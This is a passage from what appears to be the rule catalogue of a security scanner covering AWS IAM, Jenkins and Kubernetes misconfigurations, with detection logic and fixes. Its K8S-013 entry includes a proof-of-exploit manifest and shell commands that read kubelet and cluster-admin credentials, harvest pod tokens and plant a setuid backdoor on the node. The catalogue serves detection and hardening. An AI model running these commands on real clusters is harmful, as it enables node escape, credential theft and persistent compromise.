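A minimal sketch of the scoped policy statement (JSON, as IAM policies are written); the role ARN and service are placeholders:
{
  "Effect": "Allow",
  "Action": "iam:PassRole",
  "Resource": "arn:aws:iam::123456789012:role/app-task-role",
  "Condition": {
    "StringEquals": { "iam:PassedToService": "ecs-tasks.amazonaws.com" }
  }
}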
Source: IAM-004 in the AWS provider.
IAM-005: CI/CD role trust policy missing sts:ExternalId HIGH
Evidences: AC-2 Account Management, AC-3 Access Enforcement.
How this is detected. A trust policy that lets an external AWS account assume the role without an sts:ExternalId condition is vulnerable to the confused-deputy pattern: a third-party SaaS configured with your role ARN can also be used by another customer of that SaaS to assume your role (if they know the ARN). sts:ExternalId ties the role to a specific tenancy.
Recommendation. Add a Condition requiring sts:ExternalId for external principals.
Source: IAM-005 in the AWS provider.
IAM-006: Sensitive actions granted with wildcard Resource MEDIUM
Evidences: AC-3 Access Enforcement, AC-6 Least Privilege.
How this is detected. IAM-002 catches Action: "*". IAM-006 catches the more common "scoped action, unscoped resource" pattern on sensitive services (S3/KMS/SecretsManager/SSM/IAM/STS/DynamoDB/Lambda/EC2).
Recommendation. Scope the Resource element to specific ARNs (buckets, keys, secrets, roles).
Source: IAM-006 in the AWS provider.
JF-001: Shared library not pinned to a tag or commit HIGH
Evidences: SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. @main, @master, @develop, no-@ref, and any non-semver / non-SHA ref are floating. Whoever controls the upstream library can ship code into your build by pushing to that branch.
Recommendation. Pin every @Library('name@<ref>') to a release tag (e.g. @v1.4.2) or a 40-char commit SHA. Configure the library in Jenkins with 'Allow default version to be overridden' disabled so a pipeline can't escape the pin.
Source: JF-001 in the Jenkins provider.
JF-004: AWS auth uses long-lived access keys via withCredentials MEDIUM 🔧 fix
Evidences: IA-5 Authenticator Management.
How this is detected. Fires when BOTH a credentialsId containing aws is referenced AND an AWS key variable name appears (requires both so an OIDC role binding doesn't false-positive). Also fires when withAWS(credentials: '…') is used; the safe alternative is withAWS(role: '…').
Recommendation. Switch to the AWS plugin's IAM-role / OIDC binding (e.g. withAWS(role: 'arn:aws:iam::…:role/jenkins')) so each build assumes a short-lived role. Remove the static AWS_ACCESS_KEY_ID secret from the Jenkins credentials store once the role is in place.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: JF-004 in the Jenkins provider.
JF-008: Credential-shaped literal in pipeline body CRITICAL 🔧 fix
Evidences: IA-5 Authenticator Management.
How this is detected. Scans the raw Jenkinsfile text against the cross-provider credential-pattern catalog. Secrets committed to Groovy source are visible in every fork and every build log.
Recommendation. Rotate the exposed credential. Move the value to a Jenkins credential and reference it via withCredentials([string(credentialsId: '…', variable: '…')]).
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed; if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.
Source: JF-008 in the Jenkins provider.
JF-010: Long-lived AWS keys exposed via environment {} block HIGH 🔧 fix
Evidences: IA-5 Authenticator Management.
How this is detected. Flags environment { AWS_ACCESS_KEY_ID = '...' } when the value is a literal or plain variable reference. Skips credentials('id') helpers and ${env.X} that resolve at runtime. Matches both multiline and inline environment { ... } forms.
Recommendation. Replace the literal with a credentials-store reference: AWS_ACCESS_KEY_ID = credentials('aws-prod-key'). Better: switch to the AWS plugin's role binding (withAWS(role: 'arn:…')) so the build assumes a short-lived role per run.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: JF-010 in the Jenkins provider.
JF-011: Pipeline has no buildDiscarder retention policy LOW 🔧 fix
Evidences: AU-2 Event Logging, AU-12 Audit Record Generation.
How this is detected. Without a retention policy, build logs accumulate indefinitely; a secret that once leaked into a log stays visible to anyone who can read jobs. Recognises declarative options { buildDiscarder(...) }, scripted properties([buildDiscarder(...)]), and bare logRotator(...).
Recommendation. Add options { buildDiscarder(logRotator(numToKeepStr: '30', daysToKeepStr: '90')) } (declarative) or the properties([buildDiscarder(...)]) equivalent in scripted pipelines. Tune the numbers to your retention policy.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: JF-011 in the Jenkins provider.
JF-015: Pipeline has no timeout wrapper, unbounded build MEDIUM 🔧 fix
Evidences: CM-6 Configuration Settings.
How this is detected. Without a timeout() wrapper, the pipeline runs until the Jenkins controller's global timeout (or indefinitely if none is configured). Explicit timeouts cap blast radius and the window during which a compromised step has workspace access.
Recommendation. Wrap the pipeline body or individual stages with timeout(time: N, unit: 'MINUTES') { … }. Without an explicit timeout, the build runs until the Jenkins global default (or indefinitely).
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: JF-015 in the Jenkins provider.
K8S-001: Container image not pinned by sha256 digest HIGH 🔧 fix
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Reuses _primitives.image_pinning.classify so the floating-tag semantics match DF-001 / GL-001 / JF-009 / ADO-009 / CC-003. Even a PINNED_TAG like nginx:1.25.4 is treated as unpinned (only an explicit @sha256: survives), since a tag is mutable on the registry side and Kubernetes will happily pull the new content on a node restart.
Recommendation. Resolve every workload container image to its current digest (crane digest <ref> or docker buildx imagetools inspect) and pin via image: repo@sha256:<digest>. Floating tags (:latest, :3, no tag) silently swap the running image on the next rollout, breaking provenance and reproducibility.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-001 in the Kubernetes provider.
K8S-002: Pod hostNetwork: true HIGH 🔧 fix
Evidences: CM-7 Least Functionality, SC-7 Boundary Protection.
How this is detected. Compromised containers on hostNetwork can sniff or interfere with traffic from every other pod on the node. Reserve the flag for system DaemonSets that genuinely require it (CNI agents, ingress data planes); applications never need it.
Recommendation. Set spec.hostNetwork: false (the default) on every workload. hostNetwork: true puts the pod directly on the node's network namespace, exposing every host-bound listener to the container and bypassing CNI network policies.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-002 in the Kubernetes provider.
K8S-003: Pod hostPID: true HIGH 🔧 fix
Evidences: CM-7 Least Functionality, SC-7 Boundary Protection.
How this is detected. There is no application use case for hostPID. Only specialised node agents (process exporters, debuggers) legitimately need it, and those are typically deployed via a system DaemonSet with an explicit security review.
Recommendation. Set spec.hostPID: false (the default) on every workload. hostPID: true makes every host process visible inside the container, and combined with privileged execution allows trivial escape via nsenter / /proc/<pid>/root.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-003 in the Kubernetes provider.
K8S-004: Pod hostIPC: true HIGH 🔧 fix
Evidences: CM-7 Least Functionality, SC-7 Boundary Protection.
How this is detected. Modern applications coordinate via gRPC / sockets, never via host IPC. Treat this flag as a strong red flag in code review unless paired with a documented system-level use case.
Recommendation. Set spec.hostIPC: false (the default) on every workload. hostIPC: true lets the container read and write the host's shared-memory segments and POSIX message queues, exposing data exchanged by every other process on the node.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-004 in the Kubernetes provider.
K8S-005: Container securityContext.privileged: true CRITICAL 🔧 fix
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings, CM-7 Least Functionality.
How this is detected. privileged: true is the strongest possible escalation in Kubernetes. It overrides every other securityContext setting and is the single largest cluster-takeover vector after RBAC misconfiguration.
Recommendation. Remove securityContext.privileged: true from every container. A privileged container has full access to the host's devices and capabilities; escape to the node is trivial. If the workload genuinely needs a kernel capability, grant only that capability via capabilities.add rather than enabling privileged mode.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-005 in the Kubernetes provider.
K8S-006: Container allowPrivilegeEscalation not explicitly false HIGH 🔧 fix
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. The default for non-root containers is true (Pod Security Standard 'baseline' allows this; 'restricted' does not). An explicit false is required because Kubernetes treats an unset field as a deferral to the cluster admission controller, which may not enforce restricted.
Recommendation. Set securityContext.allowPrivilegeEscalation: false on every container. The Linux no_new_privs flag stops setuid binaries and capabilities from gaining elevated privileges; without it, a compromised process can escalate via setuid utilities still installed in many base images.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-006 in the Kubernetes provider.
K8S-007: Container runAsNonRoot not true / runAsUser is 0 HIGH 🔧 fix
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. A container is considered safe when EITHER its own securityContext OR the pod-level securityContext sets runAsNonRoot: true and a non-zero runAsUser. An explicit runAsUser: 0 always fails, even if runAsNonRoot is unset.
Recommendation. Set securityContext.runAsNonRoot: true and runAsUser: <non-zero UID> on every container, OR set the same fields at pod level so all containers inherit. Running as UID 0 inside a container makes container-escape exploits dramatically more dangerous: the attacker already has root inside the container, so any kernel CVE that matters becomes immediately exploitable.
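A minimal sketch of the pod-level form, which every container inherits; the UID is an arbitrary non-zero example:
spec:
  securityContext:
    runAsNonRoot: true   # kubelet refuses to start an image that resolves to root
    runAsUser: 10001     # any non-zero UID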
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-007 in the Kubernetes provider.
K8S-008: Container readOnlyRootFilesystem not true MEDIUM 🔧 fix
Evidences: CM-6 Configuration Settings, SC-28 Protection of Information at Rest.
How this is detected. Many post-exploitation toolchains (cryptominers, persistence implants, shell-callbacks) assume a writable root. Locking it down forces the attacker to use distroless or runtime tmpfs they can't easily place.
Recommendation. Set securityContext.readOnlyRootFilesystem: true on every container. A read-only root filesystem stops attackers from dropping additional payloads into /tmp, /var, or writable system paths. Mount tmpfs emptyDir volumes for the directories the application genuinely needs to write to.
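A minimal sketch pairing the read-only root with a tmpfs mount for the one writable path; the names and image reference are illustrative:
containers:
  - name: app
    image: registry.example.com/app@sha256:<digest>   # placeholder ref
    securityContext:
      readOnlyRootFilesystem: true
    volumeMounts:
      - name: tmp
        mountPath: /tmp
volumes:
  - name: tmp
    emptyDir:
      medium: Memory   # tmpfs; contents vanish with the pod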
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-008 in the Kubernetes provider.
K8S-009: Container capabilities not dropping ALL / adding dangerous caps HIGH
Evidences: AC-6 Least Privilege, CM-7 Least Functionality.
How this is detected. Fails when the container does NOT drop ALL or when capabilities.add includes any of: SYS_ADMIN, NET_ADMIN, SYS_PTRACE, SYS_MODULE, DAC_READ_SEARCH, DAC_OVERRIDE, SYS_RAWIO, SYS_BOOT, BPF, PERFMON, or the literal ALL.
Recommendation. Drop every capability and add back only what the workload actually needs:
securityContext:
capabilities:
drop: ["ALL"]
add: ["NET_BIND_SERVICE"] # only if binding <1024
Most stateless services need no capabilities at all. Avoid SYS_ADMIN (effectively root), SYS_PTRACE (process snooping), NET_ADMIN (raw socket access), and SYS_MODULE (kernel module loading).
Source: K8S-009 in the Kubernetes provider.
K8S-010: Container seccompProfile not RuntimeDefault or Localhost MEDIUM
Evidences: CM-6 Configuration Settings, SI-7 Software, Firmware, and Information Integrity.
How this is detected. Pod-level securityContext.seccompProfile covers all containers in the pod. Either path passes this rule. The default of Unconfined (or unset, which inherits the node default, usually Unconfined) fails.
Recommendation. Set securityContext.seccompProfile.type: RuntimeDefault (or Localhost with a path to your tuned profile) at either pod or container level. Without seccomp, every syscall is reachable from the container; modern kernel CVEs (e.g. io_uring) become trivially exploitable.
Source: K8S-010 in the Kubernetes provider.
K8S-011: Pod serviceAccountName unset or 'default' MEDIUM
Evidences: AC-2 Account Management, AC-6 Least Privilege.
How this is detected. Both an unset serviceAccountName (which defaults to default) and an explicit serviceAccountName: default fail the rule. Pair this with K8S-012 to also disable token auto-mounting where the workload doesn't need API access.
Recommendation. Bind every workload to a dedicated, narrow ServiceAccount. The 'default' SA exists in every namespace and tends to accrete RoleBindings over time; using it gives the workload every privilege any other service in the namespace ever needed. Create a per-workload SA with the minimum RBAC needed and reference it via spec.serviceAccountName.
Source: K8S-011 in the Kubernetes provider.
K8S-012: Pod automountServiceAccountToken not false MEDIUM
Evidences: AC-6 Least Privilege, CM-7 Least Functionality.
How this is detected. An unset value defaults to true in Kubernetes. This rule fails on unset because most application workloads do NOT need API access and the default exposes credentials by accident. Workloads that explicitly call the API should set the field to true so the choice is visible in code review.
Recommendation. Set spec.automountServiceAccountToken: false on every workload that doesn't need to talk to the Kubernetes API. Auto-mounted SA tokens are a free credential for an attacker who lands a shell; without explicit opt-out the token sits at /var/run/secrets/kubernetes.io/serviceaccount/token ready to be exfiltrated. If the workload needs API access, leave it true but pair with a tight, dedicated RBAC role.
Source: K8S-012 in the Kubernetes provider.
K8S-013: Pod uses a hostPath volume HIGH 🔧 fix
Evidences: AC-6 Least Privilege, SC-7 Boundary Protection, SI-7 Software, Firmware, and Information Integrity.
How this is detected. Some legitimate system DaemonSets need hostPath (log collectors, CSI node plugins). Those should be deployed with explicit security review and a narrow path:; this rule fires regardless because application workloads should never use hostPath.
Recommendation. Replace hostPath volumes with configMap, secret, emptyDir, persistentVolumeClaim, or CSI volumes. hostPath opens a direct read/write window onto the node's filesystem; combined with even mild container compromise it gives the attacker access to other pods' data, kubelet credentials, and the container runtime.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- CVE-2021-25741 (Kubernetes subPath symlink escape): a container with hostPath plus subPath could traverse outside the volume boundary and read or modify arbitrary host files. Exploitable on any cluster permitting hostPath to non-system workloads.
- TeamTNT / Kinsing crypto-jacking campaigns (2020-2022): cluster compromise reports repeatedly traced lateral movement from a single misconfigured pod to the underlying node via hostPath: /, then to kubelet credentials and other tenants. Sysdig and Aqua incident reports document the pattern.
Proof of exploit.
Vulnerable: pod mounts the host's root filesystem.
apiVersion: v1
kind: Pod
metadata:
  name: attacker
spec:
  containers:
    - name: shell
      image: busybox
      command: ["sleep", "infinity"]
      volumeMounts:
        - name: host-root
          mountPath: /host
  volumes:
    - name: host-root
      hostPath:
        path: /   # full node filesystem
Attack from a shell inside the container:
# Read kubelet credentials and pivot to API server:
cat /host/var/lib/kubelet/kubeconfig
cat /host/etc/kubernetes/admin.conf
# Read service account tokens for every other pod on
# the node and impersonate them:
ls /host/var/lib/kubelet/pods/*/volumes/kubernetes.io~projected/*/token
# Drop a setuid binary and pin persistence on the host:
cp /bin/busybox /host/usr/local/bin/.bd
chmod 4755 /host/usr/local/bin/.bd
Safe: use scoped volume types that don't bridge to the host.
spec:
  volumes:
    - name: data
      persistentVolumeClaim:
        claimName: app-data
Source: K8S-013 in the Kubernetes provider.
K8S-014: Pod hostPath references a sensitive host directory CRITICAL
Evidences: AC-6 Least Privilege, SC-7 Boundary Protection, SI-7 Software, Firmware, and Information Integrity.
How this is detected. Stricter than K8S-013: that rule flags any hostPath, this one upgrades to CRITICAL when the path is one of the well-known cluster-escape vectors.
Recommendation. Never mount the container runtime socket (/var/run/docker.sock, containerd.sock, crio.sock), kubelet credentials (/var/lib/kubelet), the cluster config (/etc/kubernetes), the host root (/), or /proc / /sys / /etc into a workload container. Each of these is a one-line cluster takeover. If a container genuinely needs node-level metrics, use an exporter DaemonSet with a narrowly-scoped read-only mount.
Source: K8S-014 in the Kubernetes provider.
K8S-015: Container missing resources.limits.memory MEDIUM
Evidences: CM-6 Configuration Settings.
How this is detected. Init containers and ephemeral containers are also checked: a leaking init container holds a slot on the node until it completes and can crowd out other pods just as readily as an application container.
Recommendation. Set resources.limits.memory on every container. Without a memory limit, a leaking or compromised container can consume the node's RAM until the kernel OOM-kills neighbouring pods, taking down workloads that share the node. Pair the limit with a requests.memory to inform the scheduler.
Source: K8S-015 in the Kubernetes provider.
K8S-016: Container missing resources.limits.cpu LOW
Evidences: CM-6 Configuration Settings.
How this is detected. Lower severity than K8S-015 because CPU throttling is self-healing (workloads slow down rather than die) and some controllers (e.g. SchedulerProfile, LimitRange) supply a cluster-default cpu limit transparently.
Recommendation. Set resources.limits.cpu on every container. CPU throttling is the kernel's defense against a neighbour consuming all node cycles; without a limit, a compromised container can stall everything else on the node, including the kubelet. Pair the limit with a requests.cpu for scheduling.
Source: K8S-016 in the Kubernetes provider.
K8S-017: Container env value carries a credential-shaped literal CRITICAL
Evidences: IA-5 Authenticator Management.
How this is detected. Reuses _primitives/secret_shapes, flags AKIA-prefixed AWS access keys outright, plus credential-named keys (API_KEY, DB_PASSWORD, SECRET_TOKEN) when the value is a non-empty literal. valueFrom entries are always safe (no inline value).
Recommendation. Replace literal env[].value entries that hold credentials with env[].valueFrom.secretKeyRef or envFrom.secretRef. A literal env value lives in the manifest YAML. It gets committed to git, surfaced by kubectl get pod -o yaml, and embedded in audit logs. Externalising into a Secret (and ideally a SealedSecret / ExternalSecret / SOPS-encrypted source) keeps the value out of the manifest.
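A minimal sketch of the valueFrom indirection; the secret and key names are illustrative:
env:
  - name: DB_PASSWORD
    valueFrom:
      secretKeyRef:
        name: app-secrets     # the Secret object holds the value
        key: db-password      # the manifest carries only the reference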
Source: K8S-017 in the Kubernetes provider.
K8S-018: Secret stringData/data carries a credential-shaped literal CRITICAL
Evidences: IA-5 Authenticator Management, SC-28 Protection of Information at Rest.
How this is detected. Walks both stringData (plain text) and data (base64). Base64-encoded values are decoded and checked for AKIA-shaped AWS keys. Credential-shaped key NAMES with any non-empty value are flagged regardless of encoding: even if the value is the literal placeholder REPLACE_ME, having the name in the manifest is a maintenance footgun.
Recommendation. A Kind: Secret manifest committed to git defeats every secret-management story Kubernetes claims to provide; the base64 encoding in data is not encryption. Replace with SealedSecrets (Bitnami), ExternalSecrets / ESO, SOPS-encrypted manifests, or HashiCorp Vault Agent injection. If the manifest must remain in git, the only acceptable contents are placeholders that are filled in by an operator at apply time.
Source: K8S-018 in the Kubernetes provider.
K8S-019: Workload deployed in the 'default' namespace LOW
Evidences: CM-6 Configuration Settings.
How this is detected. Severity is LOW because in a well-curated cluster the default namespace is empty by policy. If your cluster treats default as a sandbox you can suppress this rule via .pipelinecheckignore.
Recommendation. Set metadata.namespace to a dedicated namespace per workload (or per environment). The default namespace tends to accumulate cluster-wide RoleBindings, NetworkPolicies, and operators that grant broader access than intended; placing application workloads there means every privilege grant in default applies to them. A purpose-built namespace also lets you enforce Pod Security Standards (pod-security.kubernetes.io/enforce label) scoped to that workload.
Source: K8S-019 in the Kubernetes provider.
K8S-020: ClusterRoleBinding grants cluster-admin or system:masters CRITICAL 🔧 fix
Evidences: AC-3 Access Enforcement, AC-6 Least Privilege.
How this is detected. The rule fires on a ClusterRoleBinding whose roleRef.name is cluster-admin, admin, or system:masters. Subject type does not matter; even binding cluster-admin to a Group is a cluster-takeover risk.
Recommendation. Replace cluster-admin / system:masters bindings with narrowly-scoped ClusterRoles or namespace-scoped Roles. Granting cluster-admin to a service account is equivalent to giving every pod that uses it root on every node; credential theft from any such pod becomes immediate cluster takeover. Audit-log every existing cluster-admin binding and replace each with the minimum verbs/resources the consumer actually needs.
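A sketch of the replacement pattern, narrowing a cluster-admin binding to the verbs/resources a deploy bot actually needs; names and namespace are illustrative, and the explicit verb/resource lists are the same shape K8S-021 asks for:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: deploy-reader          # illustrative
  namespace: payments
rules:
  - apiGroups: ["apps"]
    resources: ["deployments"]
    verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: ci-deploy-reader
  namespace: payments
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: deploy-reader
subjects:
  - kind: ServiceAccount
    name: ci-bot               # illustrative consumer
    namespace: payments
```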
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- Tesla Kubernetes dashboard compromise (RedLock, 2018): an unauthenticated Kubernetes dashboard exposed to the internet held tokens for service accounts bound to cluster-admin. Attackers used the dashboard credentials to deploy crypto-mining workloads with full cluster access. Least-privilege RBAC would have capped the blast radius even after dashboard exposure.
- Argo CD CVE-2022-24348 / CVE-2022-24768 chain (2022): directory traversal plus a default cluster-admin install let any project member exfiltrate cluster-wide secrets. Argo's recommendation post-fix was to scope the controller's RBAC away from cluster-admin so a similar future bug couldn't escalate the same way.
Source: K8S-020 in the Kubernetes provider.
K8S-021: Role or ClusterRole grants wildcard verbs+resources HIGH
Evidences: AC-3 Access Enforcement, AC-6 Least Privilege, CM-7 Least Functionality.
How this is detected. Fires on any rule entry where BOTH verbs and resources contain a literal "*". A wildcard in only one of the two is still risky but is often a legitimate read-everything pattern (e.g. monitoring); this rule targets the strict superset 'do anything to everything'.
Recommendation. Replace verbs: ["*"] and resources: ["*"] with explicit lists. Wildcards bypass the principle of least privilege: today they grant read pods and tomorrow they grant delete crds because a new resource was registered in that apiGroup. Explicit verbs (get, list, watch) and explicit resources (configmaps, services) keep grants stable across cluster upgrades.
Source: K8S-021 in the Kubernetes provider.
K8S-022: Service exposes SSH (port 22) MEDIUM
Evidences: CM-7 Least Functionality, SC-7 Boundary Protection.
How this is detected. Mirrors DF-013 (EXPOSE 22 in a Dockerfile) at the Service level. The check fires on Service ports whose port or targetPort is 22, regardless of Service type; a NodePort/LoadBalancer on 22 is dramatically worse, but a ClusterIP on 22 still indicates an sshd container somewhere.
Recommendation. Containers should not run sshd. If you need an interactive shell into a running pod, use kubectl exec (subject to RBAC) or kubectl debug. Removing the port-22 Service removes a pre-auth network surface that's a frequent lateral-movement target after initial cluster compromise.
Source: K8S-022 in the Kubernetes provider.
K8S-023: Namespace missing Pod Security Admission enforcement label HIGH
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. Pod Security Admission (PSA) replaced the deprecated PodSecurityPolicy in 1.25. The three levels are privileged, baseline, and restricted; baseline is a sensible production default and restricted matches the spirit of K8S-005..010. kube-system is exempt by convention since control-plane pods may legitimately need elevated permissions.
Recommendation. Set metadata.labels.pod-security.kubernetes.io/enforce to baseline or restricted on every Namespace. Without an enforce label the namespace runs the cluster's default policy, which on most installations is privileged and silently admits pods that violate every K8S-002..010 rule.
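A minimal Namespace manifest with the enforcement label set, and the warn/audit tiers one level ahead per K8S-031 (namespace name illustrative):

```yaml
apiVersion: v1
kind: Namespace
metadata:
  name: payments
  labels:
    pod-security.kubernetes.io/enforce: baseline
    pod-security.kubernetes.io/warn: restricted    # one tier ahead (K8S-031)
    pod-security.kubernetes.io/audit: restricted
```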
Known false positives.
- Single-tenant clusters running only operator-managed workloads may apply PSA via an admission webhook instead. The label-based check can't see that.
Source: K8S-023 in the Kubernetes provider.
K8S-024: Container missing both livenessProbe and readinessProbe MEDIUM
Evidences: AU-2 Event Logging, SI-2 Flaw Remediation.
How this is detected. Init containers and ephemeral debug containers are exempt; neither makes sense to probe. Jobs and CronJobs are also exempt because Kubernetes treats them as one-shot work; completion is the lifecycle signal, not health.
Recommendation. Define at least one of livenessProbe or readinessProbe on every long-running container. Without probes, a wedged pod stays listed as Running and keeps receiving traffic, which masks incidents and amplifies the blast radius of a single faulty replica.
Source: K8S-024 in the Kubernetes provider.
K8S-025: System priority class used outside kube-system HIGH
Evidences: AC-6 Least Privilege, CM-7 Least Functionality.
How this is detected. The kubelet reserves the two system-* priority classes for its own pods (kube-proxy, CNI agents). Granting them to a user workload also grants the right to preempt and evict anything below 2000000000, which is every non-system pod on the cluster. Outside kube-system this is almost always a misconfiguration copy-pasted from a control-plane manifest.
Recommendation. Reserve system-cluster-critical and system-node-critical priority classes for control-plane workloads in kube-system. Application pods that adopt them gain the right to evict normal workloads under resource pressure, which is a quiet path to a cluster-wide outage if the application has a bug or the attacker has any control over its spec.
Source: K8S-025 in the Kubernetes provider.
K8S-026: LoadBalancer Service has no loadBalancerSourceRanges HIGH
Evidences: AC-3 Access Enforcement, SC-7 Boundary Protection.
How this is detected. Internal-only services should use type: ClusterIP (and an Ingress for HTTP) or set the cloud-provider-specific internal-LB annotation. loadBalancerSourceRanges is the Kubernetes-native, cloud-portable way to scope an external LB; cloud-specific firewalls (AWS security groups, GCP firewall rules) are equivalent at the L4 level but invisible to a manifest scanner.
Recommendation. Restrict every Service of type: LoadBalancer with spec.loadBalancerSourceRanges. The default behavior is to provision an internet-facing load balancer that accepts traffic from 0.0.0.0/0, which exposes whatever the Service fronts to the entire internet. A short list of CIDRs scoped to known clients (office IPs, a NAT gateway, peered VPCs) removes the pre-auth attack surface entirely.
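A sketch of the scoped shape; the CIDRs are illustrative (TEST-NET ranges):

```yaml
apiVersion: v1
kind: Service
metadata:
  name: api
spec:
  type: LoadBalancer
  selector:
    app: api
  ports:
    - port: 443
      targetPort: 8443
  loadBalancerSourceRanges:
    - 203.0.113.0/24           # office egress (illustrative)
    - 198.51.100.7/32          # NAT gateway (illustrative)
```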
Source: K8S-026 in the Kubernetes provider.
K8S-027: Ingress has no TLS configuration MEDIUM
Evidences: SC-8 Transmission Confidentiality and Integrity, SC-13 Cryptographic Protection.
How this is detected. An Ingress with no spec.tls (or an empty list) terminates HTTP at the load balancer and proxies plaintext upstream. Ingress controllers will respect ssl-redirect annotations, but those are advisory until tls: is populated. If the Ingress is intentionally HTTP-only (e.g. an ACME challenge endpoint or an internal-only path served behind a network policy), suppress via .pipelinecheckignore with a short rationale rather than leaving it open.
Recommendation. Add a spec.tls block to every Ingress that fronts an HTTP backend. Each entry pairs one or more hostnames with a Secret holding the certificate / key; the canonical pattern is to provision the Secret via cert-manager and a ClusterIssuer pointing at Let's Encrypt or an internal CA. Plaintext-only Ingress lets a network attacker downgrade the connection and read or rewrite request bodies, which matters for any path carrying credentials, session cookies, or PII.
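A sketch of the cert-manager pattern; the issuer name, hostname, and Secret name are hypothetical:

```yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: app
  annotations:
    cert-manager.io/cluster-issuer: letsencrypt   # hypothetical ClusterIssuer
spec:
  tls:
    - hosts: [app.example.com]
      secretName: app-tls      # provisioned by cert-manager
  rules:
    - host: app.example.com
      http:
        paths:
          - path: /
            pathType: Prefix
            backend:
              service:
                name: app
                port:
                  number: 8080
```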
Source: K8S-027 in the Kubernetes provider.
K8S-028: Container declares hostPort MEDIUM 🔧 fix
Evidences: CM-7 Least Functionality, SC-7 Boundary Protection.
How this is detected. hostPort was the pre-Service way to publish a pod's port and survives in legacy manifests. Modern clusters use Services, which integrate with kube-proxy, ingress controllers, and NetworkPolicies. hostPort is invisible to all of those; a port-scan from any other pod that knows the node IP reaches the workload directly. If a DaemonSet legitimately needs it (host-agent shape), suppress this rule with a brief .pipelinecheckignore rationale rather than leaving it open across the catalog.
Recommendation. Drop hostPort from container ports and use a Service (ClusterIP / NodePort / LoadBalancer) to publish the workload. hostPort binds directly to the node IP, bypasses the cluster's network model, and creates a node-level scheduling constraint that fails replicas with the same port. Workloads that genuinely need node-port binding (some CNI/storage agents) should declare it on a DaemonSet with hostNetwork: true already approved by review.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: K8S-028 in the Kubernetes provider.
K8S-029: RoleBinding grants permissions to the default ServiceAccount HIGH 🔧 fix
Evidences: AC-3 Access Enforcement, AC-6 Least Privilege.
How this is detected. Fires when a RoleBinding or ClusterRoleBinding lists kind: ServiceAccount, name: default among its subjects. kube-system, kube-public, and kube-node-lease are exempt because control-plane bootstrap manifests legitimately grant the default SA there.
Recommendation. Bind permissions to a dedicated ServiceAccount, not to default. Every pod that omits serviceAccountName runs as the namespace's default SA, so a binding to it grants the same verbs to every untargeted pod in that namespace, including future workloads. Create a purpose-built SA, set automountServiceAccountToken: false on the default, and bind to the new SA explicitly.
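A sketch of the full remediation, with names and the referenced Role hypothetical; the second document also applies the K8S-034 fix to the namespace default SA:

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-runner             # purpose-built SA
  namespace: payments
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: default                # lock down the namespace default
  namespace: payments
automountServiceAccountToken: false
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: app-runner-config-reader
  namespace: payments
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: config-reader          # hypothetical narrow Role
subjects:
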